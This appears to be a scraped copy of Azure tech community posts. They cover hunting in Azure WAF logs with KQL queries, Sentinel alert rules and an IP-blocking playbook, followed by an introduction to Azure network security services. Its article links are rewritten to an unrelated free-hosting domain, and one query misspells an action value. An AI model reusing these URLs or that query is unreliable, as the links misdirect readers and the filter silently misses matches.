an alert could be triggered for further investigation.</P> <P>However, since each environment is different, we will have to modify the threshold value accordingly. Additionally, IP based session tracking have their own challenges and false positives due to various dynamic factors like Proxy/NAT etc. that we would have to be mindful of for these type of queries.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="sql">let Threshold = 200;&nbsp; //Adjust the threshold to a suitable value based on Environment, Time Period. let AllData =&nbsp; AzureDiagnostics | where TimeGenerated &gt;= ago(1d) | where Category in ("FrontdoorWebApplicationFirewallLog", "FrontdoorAccessLog", "ApplicationGatewayFirewallLog", "ApplicationGatewayAccessLog") | extend ClientIPAddress = iff( Category in ("FrontdoorWebApplicationFirewallLog", "ApplicationGatewayAccessLog"), clientIP_s, clientIp_s); let SuspiciousIP = AzureDiagnostics | where TimeGenerated &gt;= ago(1d) | where Category in ( "ApplicationGatewayFirewallLog", "ApplicationGatewayAccessLog", "FrontdoorWebApplicationFirewallLog", "FrontdoorAccessLog") | extend ClientIPAddress = iff( Category in ("FrontdoorWebApplicationFirewallLog", "ApplicationGatewayAccessLog"), clientIP_s, clientIp_s) | extend SessionTrackingID = iff( Category in ("FrontdoorWebApplicationFirewallLog", "FrontdoorAccessLog"), trackingReference_s, transactionId_g) | distinct&nbsp; ClientIPAddress, SessionTrackingID | summarize count() by ClientIPAddress | where count_ &gt; Threshold | distinct ClientIPAddress; SuspiciousIP | join kind = inner ( AllData) on ClientIPAddress | extend SessionTrackingID = iff( Category in ("FrontdoorWebApplicationFirewallLog", "FrontdoorAccessLog"), trackingReference_s, transactionId_g) | summarize makeset(requestUri_s), makeset(requestQuery_s), makeset(SessionTrackingID), makeset(clientPort_d),&nbsp; SessionCount = count() by ClientIPAddress, _ResourceId | extend HostCustomEntity =&nbsp; _ResourceId, IPCustomEntity = ClientIPAddress</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>Another way to leverage the WAF data could be through Indicators of Compromise (IoCs) matching. IoCs are data that associates observations such as URLs, file hashes or IP addresses with known threat activity such as phishing, botnets, or malware. Many organizations aggregate threat indicators feed from a variety of sources, curate the data and then apply it to their available logs. They could match these IoCs with their WAF logs as well. For more details check out this <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/bring-your-threat-intelligence-to-azure-sentinel/ba-p/1167546" target="_blank" rel="noopener">great blog post</A> that talks about how you can import threat intelligence (TI) data into Azure Sentinel.&nbsp; Once the TI data is imported in Azure Sentinel you can view it in the ThreatIntelligenceIndicator table in Logs. Below is a quick example of how you can match the WAF data with the TI data to see if there is any traffic that is originating from a Bot Network or from an IP that is known to be bad.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="sql">let dt_lookBack&nbsp; = 1h; let ioc_lookBack = 14d; ThreatIntelligenceIndicator | where TimeGenerated &gt;= ago(ioc_lookBack) and ExpirationDateTime &gt; now() | where Active == true // Picking up only IOC's that contain the entities we want | where isnotempty(NetworkIP) or isnotempty(EmailSourceIpAddress) or isnotempty(NetworkDestinationIP) or isnotempty(NetworkSourceIP) // As there is potentially more than 1 indicator type for matching IP, taking NetworkIP first, then others if that is empty. // Taking the first non-empty value based on potential IOC match availability | extend TI_ipEntity = iff(isnotempty(NetworkIP), NetworkIP, NetworkDestinationIP) | extend TI_ipEntity = iff(isempty(TI_ipEntity) and isnotempty(NetworkSourceIP), NetworkSourceIP, TI_ipEntity) | extend TI_ipEntity = iff(isempty(TI_ipEntity) and isnotempty(EmailSourceIpAddress), EmailSourceIpAddress, TI_ipEntity) | join ( AzureDiagnostics | where TimeGenerated &gt;= ago(dt_lookBack) | where Category in ( 'ApplicationGatewayFirewallLog', 'FrontdoorWebApplicationFirewallLog', 'ApplicationGatewayAccessLog', 'FrontdoorAccessLog') | where isnotempty(clientIP_s) or isnotempty(clientIp_s) | extend ClientIPAddress = iff( Category in ("FrontdoorWebApplicationFirewallLog", "ApplicationGatewayAccessLog"), clientIP_s, clientIp_s) | extend WAF_TimeGenerated = TimeGenerated ) on $left.TI_ipEntity == $right.ClientIPAddress | project TimeGenerated, ClientIPAddress, Description, ActivityGroupNames, IndicatorId, ThreatType, ExpirationDateTime, ConfidenceScore,_ResourceId, WAF_TimeGenerated, Category, ResourceGroup, SubscriptionId, ResourceType,OperationName, requestUri_s, ruleName_s, host_s, clientPort_d,details_data_s, details_matches_s, Message, ruleSetType_s, policyScope_s | extend IPCustomEntity = ClientIPAddress, HostCustomEntity = _ResourceId, timestamp = WAF_TimeGenerated, URLCustomEntity = requestUri_s</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>Threat hunters could even leverage KQL advanced modelling capabilities on WAF logs to find anomalies. For example, they could do the Time Series analysis on the WAF data. Time Series is a series of data points indexed (or listed or graphed) in time order. By analyzing time series data over an extended period, we can identify time-based patterns (e.g. seasonality, trend etc.) in the data and extract meaningful statistics which can help in flagging outliers. The different Thresholds would have to be adjusted depending on the environment. &nbsp;</P> <P>&nbsp;</P> <P>Below is an example query demonstrating Time Series IP anomaly.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="sql">let percentotalthreshold = 25; let timeframe = 1h; let starttime = 14d; let endtime = 1d; let scorethreshold = 5; let baselinethreshold = 10; let TimeSeriesData =&nbsp; AzureDiagnostics &nbsp; | where Category in ( "ApplicationGatewayFirewallLog", "ApplicationGatewayAccessLog", "FrontdoorWebApplicationFirewallLog", "FrontdoorAccessLog") and action_s in ( "Log", "Matched", "Detcted") &nbsp; | where isnotempty(clientIP_s) or isnotempty(clientIp_s) &nbsp; | extend ClientIPAddress = iff( Category in ("FrontdoorWebApplicationFirewallLog", "ApplicationGatewayAccessLog"), clientIP_s, clientIp_s) &nbsp; | where TimeGenerated between ((ago(starttime))..(ago(endtime))) &nbsp; | project TimeGenerated, ClientIPAddress &nbsp; | make-series Total=count() on TimeGenerated from (ago(starttime)) to (ago(endtime)) step timeframe by ClientIPAddress; let TimeSeriesAlerts=TimeSeriesData &nbsp; | extend (anomalies, score, baseline) = series_decompose_anomalies(Total, scorethreshold, 1, 'linefit') &nbsp; | mv-expand Total to typeof(double), TimeGenerated to typeof(datetime), anomalies to typeof(double),score to typeof(double), baseline to typeof(long) &nbsp; | where anomalies &gt; 0 | extend score = round(score,2), AnomalyHour = TimeGenerated &nbsp; | project ClientIPAddress, AnomalyHour, TimeGenerated, Total, baseline, anomalies, score &nbsp; | where baseline &gt; baselinethreshold; &nbsp; TimeSeriesAlerts &nbsp; | join ( &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; AzureDiagnostics &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;| extend ClientIPAddress = iff( Category in ("FrontdoorWebApplicationFirewallLog", "ApplicationGatewayAccessLog"), clientIP_s, clientIp_s) &nbsp; | where isnotempty(ClientIPAddress) &nbsp; | where TimeGenerated&nbsp; &gt; ago(endtime) &nbsp; | summarize HourlyCount = count(), TimeGeneratedMax = arg_max(TimeGenerated, *), ClientIPlist = make_set(clientIP_s), Portlist = make_set(clientPort_d) by clientIP_s, TimeGeneratedHour= bin(TimeGenerated, 1h) &nbsp; | extend AnomalyHour = TimeGeneratedHour &nbsp; ) on ClientIPAddress &nbsp; | extend PercentTotal = round((HourlyCount / Total) * 100, 3) &nbsp; | where PercentTotal &gt; percentotalthreshold &nbsp; | project&nbsp; AnomalyHour, TimeGeneratedMax, ClientIPAddress, ClientIPlist, Portlist, HourlyCount, PercentTotal, Total, baseline, score, anomalies, requestUri_s, trackingReference_s, _ResourceId, SubscriptionId, ruleName_s, hostname_s, policy_s, action_s &nbsp; | summarize HourlyCount=sum(HourlyCount), StartTimeUtc=min(TimeGeneratedMax), EndTimeUtc=max(TimeGeneratedMax), SourceIPlist = make_set(ClientIPAddress), Portlist = make_set(Portlist) by ClientIPAddress , AnomalyHour, Total, baseline, score, anomalies, requestUri_s, trackingReference_s, _ResourceId, SubscriptionId, ruleName_s, hostname_s, policy_s, action_s &nbsp; | extend HostCustomEntity =&nbsp; _ResourceId, IPCustomEntity = ClientIPAddress</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Generate Incidents using Azure Sentinel Analytics</H2> <P>&nbsp;</P> <P>Azure Sentinel uses the concept of Analytics to accomplish Incident creation, alerting, and eventually automated response. The main piece of any Analytic rule is the KQL query that powers it. If the query returns data (over a configured threshold), an alert will fire. To use this in practice, you need to craft a query that returns results worthy of an alert.</P> <P>&nbsp;</P> <P>The logic used can be complex, possibly adapted from the hunting logic outlined above, or fairly basic like the example below. It can be difficult to know what combination of WAF events warrant attention from analysts or even an automated response. We will assume the WAF has been tuned to eliminate most false positives, and that rule matches are usually indicative of malicious behavior.</P> <P>&nbsp;</P> <P>The Analytic Rule we will look at serves the purpose of detecting repeated attacks from the same source IP address. We simply look for WAF rule matches, which amount to traffic being blocked with WAF in Prevention Mode, and count how many there have been from the same IP in the last 5 minutes. The thinking is that if a single source is repeatedly triggering blocks, they must be up to no good.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="sql">AzureDiagnostics |&nbsp;where&nbsp;Category&nbsp;==&nbsp;"FrontdoorWebApplicationFirewallLog" |&nbsp;where&nbsp;action_s&nbsp;==&nbsp;"Block" |&nbsp;summarize&nbsp;StartTime&nbsp;=&nbsp;min(TimeGenerated),&nbsp;EndTime&nbsp;=&nbsp;max(TimeGenerated),&nbsp;count()&nbsp;by&nbsp;clientIP_s,&nbsp;host_s,&nbsp;_ResourceId |&nbsp;where&nbsp;count_&nbsp;&gt;=&nbsp;3 |&nbsp;extend&nbsp;clientIP_s,&nbsp;host_s,&nbsp;count_,&nbsp;_ResourceId |&nbsp;extend&nbsp;IPCustomEntity&nbsp;=&nbsp;clientIP_s |&nbsp;extend&nbsp;URLCustomEntity&nbsp;=&nbsp;host_s |&nbsp;extend&nbsp;HostCustomEntity&nbsp;=&nbsp;_ResourceId</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>Notice that we are using entity mapping for the resource ID of the Front Door that blocked the requests; this becomes important when creating response actions with Playbooks. The full details of our example analytic can be seen in the screen capture below:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="WAFAnalytic2.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/222600i3465939307618F49/image-size/large?v=v2&amp;px=999" role="button" title="WAFAnalytic2.gif" alt="WAFAnalytic2.gif" /></span></P> <P>&nbsp;</P> <P>With this Analytic active, any source IP address that generates 3 or more rule matches in 5 minutes will generate an alert and incident. A playbook will also be automatically triggered, which is covered in the next section.</P> <P>&nbsp;</P> <H2>Respond to Incidents with Playbooks</H2> <P>&nbsp;</P> <P>A Sentinel Playbook is what is used to execute actions in response to Incidents. Playbooks are mostly the same as <A href="#" target="_blank" rel="noopener">Logic Apps</A>, which are mostly the same as <A href="#" target="_blank" rel="noopener">Power Automate</A>. Sentinel Playbooks always start with the Sentinel trigger, which will pass dynamic content into the Logic App pipeline. Specifically, we are looking for the Resource ID of the Front Door (the Playbook also supports Application Gateway) in order to look up the information needed to perform the remediation actions.</P> <P>&nbsp;</P> <P>From the example in the Analytics section, we have detected multiple WAF rule matches from the same IP address, and we want to block any further action this attacker attempts. Of course the attacker could just keep attempting to exploit the application from different IP addresses, as they often do, but automatically blocking each IP is a low effort method to make the payoff as difficult as possible.</P> <P>&nbsp;</P> <P>The end goal of this Playbook is to create or modify a custom rule in a WAF Policy to block requests from a certain IP address. This is accomplished using the Azure REST API using the following broad steps:</P> <UL> <LI>Set variables and parse entities from the Incident</LI> <LI>Check WAF type – Front Door or App Gateway</LI> <LI>Get the associated WAF Policy</LI> <LI>Read existing custom rules and store in an array</LI> <LI>If an existing rule called “SentinelBlockIP” exists, add the attacking IP to the rule</LI> <LI>If no rule exists yet, create a custom rule blocking the attacking IP</LI> <LI>Re-assemble the WAF Policy JSON with the new or updated custom rule</LI> <LI>Initiate a PUT request against the Azure REST API to update the WAF Policy</LI> </UL> <P>Here is what the Playbook looks like:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="WAFPlaybook.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/222579iB57F93B22776F225/image-size/large?v=v2&amp;px=999" role="button" title="WAFPlaybook.gif" alt="WAFPlaybook.gif" /></span></P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener">This playbook</A> can be deployed from our GitHub repository.</P> <P>&nbsp;</P> <P>To see everything we covered in this post and more in video format, <A href="#" target="_blank" rel="noopener">check it out here</A>.</P> <P>&nbsp;</P> <P>It is our hope that you now have the tools and skills needed to take log data from Azure WAF and use it in Azure Sentinel to detect, investigate, and automatically respond to threats against your web applications.</P> Tue, 09 Feb 2021 17:57:39 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/integrating-azure-web-application-firewall-with-azure-sentinel/ba-p/1720306 Anthony_Roman 2021-02-09T17:57:39Z Introducing the Azure Network Security Tech Community and Github Repo https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/introducing-the-azure-network-security-tech-community-and-github/ba-p/1657298 <P>Hello World!</P> <P>&nbsp;</P> <P>With so many Azure customers relying on native Azure network security tools to secure their networks and applications, it is clear that there is a demand for more information on this topic. We are here to deliver just that. My team is dedicated to helping customers deploy and get the most out of Azure Network Security services, and we will be using Tech Community to amplify our voices.</P> <P>&nbsp;</P> <H2>What are the Azure Network Security services?<span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="NetSec.png" style="width: 200px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/217792iF6E19E3BB46BCFC1/image-size/small?v=v2&amp;px=200" role="button" title="NetSec.png" alt="NetSec.png" /></span></H2> <P>Azure network security is a set of native services meant to secure cloud and hybrid networks using the Zero Trust approach. To narrow it down, the primary tools we will cover here are Azure Firewall and Firewall Manager, Azure DDoS Protection, and Azure WAF. Yes, we’re aware that WAF deals with Application Security and not as much Network Security, but we’re bringing the concepts together. Web applications are delivered over networks, right?</P> <P>&nbsp;</P> <P>Naturally while we are concentrating on these core services, that does not mean others will not be discussed. Quite the opposite, in fact. Building a secure Azure network can involve a vast array of resources. Expect attention to also be paid to Azure Bastion, Network Watcher, NSGs, as well as core networking components ranging from Route Tables to Virtual WAN.</P> <P>&nbsp;</P> <P>Here’s a quick introduction to our primary tools for those that are unfamiliar:</P> <P>&nbsp;</P> <H3>Azure Firewall<span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Firewall.png" style="width: 200px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/217780i317B878C9759A2F7/image-size/small?v=v2&amp;px=200" role="button" title="Firewall.png" alt="Firewall.png" /></span></H3> <P>Azure Firewall is the Azure-native PaaS firewall. Not to be confused with NSGs or resource firewalls on other PaaS services, Azure Firewall is built to be a centrally deployed and managed service that handles all the traffic from your regional deployments. Being a PaaS service, it auto-scales to accommodate increasingly demanding workloads, and it can be managed using the tools and methods you are already using to deploy and manage other resources – CLI, API, ARM, or whichever combination of abbreviations suits you best.</P> <P>&nbsp;</P> <P>Azure Firewall is meant to perform all the same functions as most Network Virtual Appliances (NVAs), including segmenting east-west traffic within your VNets and controlling inbound and outbound traffic. <A href="#" target="_blank" rel="noopener">Learn more in the docs</A>.</P> <P>&nbsp;</P> <H3>Azure Firewall Manager<span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="FirewallManager.png" style="width: 200px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/217782i4095BA45AE4DB8A6/image-size/small?v=v2&amp;px=200" role="button" title="FirewallManager.png" alt="FirewallManager.png" /></span></H3> <P>Firewall Manager is a service that serves a growing number of purposes. First, it allows for easy management of multiple Azure Firewalls. By abstracting the Firewall Policy away from each individual Firewall, you can use Firewall Manager to assign a central set of policies to one or many Firewalls across the globe. Additionally, Firewall Manager can be used to manage security services in Azure VWAN Hubs, which can either be more Azure Firewalls or third-party services such as Zscaler and iboss.</P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener">Read the docs</A> to get the full story on Firewall Manager.</P> <P>&nbsp;</P> <H3>Azure WAF<span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="WAF.png" style="width: 200px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/217783i491D0097C21E1459/image-size/small?v=v2&amp;px=200" role="button" title="WAF.png" alt="WAF.png" /></span></H3> <P>Azure Web Application Firewall, as the name implies, is a firewall specifically meant to inspect web application traffic. Azure WAF can be attached to Application Gateway, Front Door, or CDN. There are some differences based on which service WAF is attached to, but the major function is the same – WAF analyzes decrypted traffic to match every request against its rules. These rules can consist of managed rulesets that look for common attacks found in the OWASP Top 10, bot protection rulesets that can block known malicious bot traffic, and custom rules that can look for various combinations of patterns.</P> <P>&nbsp;</P> <P>To learn more, <A href="#" target="_blank" rel="noopener">read some more docs</A>.</P> <P>&nbsp;</P> <H3>Azure DDoS Protection Standard<span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="DDoSProtection.png" style="width: 166px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/217784iDEB264C369D8E26B/image-size/small?v=v2&amp;px=200" role="button" title="DDoSProtection.png" alt="DDoSProtection.png" /></span></H3> <P>Every resource that lives in an Azure data center benefits from the inbuilt platform-level DDoS Protection. Our DDoS Protection infrastructure is in place to ensure the availability of each Azure region, and this protection is inherited by every Azure service. For customers that need to ensure that their workloads are protected against every attack, DDoS Protection Standard is available to tune the protection mechanisms to each individual workload. Along with Standard comes several other features, which include cost protection for resources that auto-scale during an attack, high-priority support during attacks, and some great logging to feed to your SOC.</P> <P>&nbsp;</P> <P>This is the final time in this post that <A href="#" target="_blank" rel="noopener">docs will be read</A>.</P> <P>&nbsp;</P> <H2>GitHub Repository<span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="GitHub-Mark-120px-plus.png" style="width: 120px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/217785i1DD31E8F9D62F29D/image-size/large?v=v2&amp;px=999" role="button" title="GitHub-Mark-120px-plus.png" alt="GitHub-Mark-120px-plus.png" /></span></H2> <P>&nbsp;</P> <P>There has been such an appetite among our customers for useful technical content that we decided to create a GitHub repo just for Azure network security. Find it at <A href="#" target="_blank" rel="noopener">Aka.ms/AzNetSec</A>. You will find a combination of scripts, Policies, KQL queries, ARM templates, Azure Monitor Workbooks, and other odds and ends. Our goal is to make everything as useful as possible to take the guess work out of using our tools.</P> <P>&nbsp;</P> <P>We encourage contributions from the community, so if you have something you think may be useful to others, don’t hesitate to fork and send us a pull request. Even if you don’t wish to contribute, please leave us feedback and suggestions for new content to create; we strive for continuous improvement. If you have suggestions or feedback regarding specific product features, please use <A href="#" target="_blank" rel="noopener">Azure User Voice</A>. Yes, we do monitor it and use the feedback when planning features.</P> <P>&nbsp;</P> <H2>Tech Community Plans</H2> <P>&nbsp;</P> <P>This has been a quick introductory post to share this team’s focus and areas of interest. We have lots of ideas for things to share in the future based on our experience with customers, but we also want to listen to the feedback we receive here. If there is something you would like to know more about, please leave a comment here or post about it in the Network Security <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/bd-p/AzureNetworkSecurity" target="_blank" rel="noopener">conversations space</A>.</P> <P>&nbsp;</P> Fri, 11 Sep 2020 16:41:31 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/introducing-the-azure-network-security-tech-community-and-github/ba-p/1657298 Anthony_Roman 2020-09-11T16:41:31Z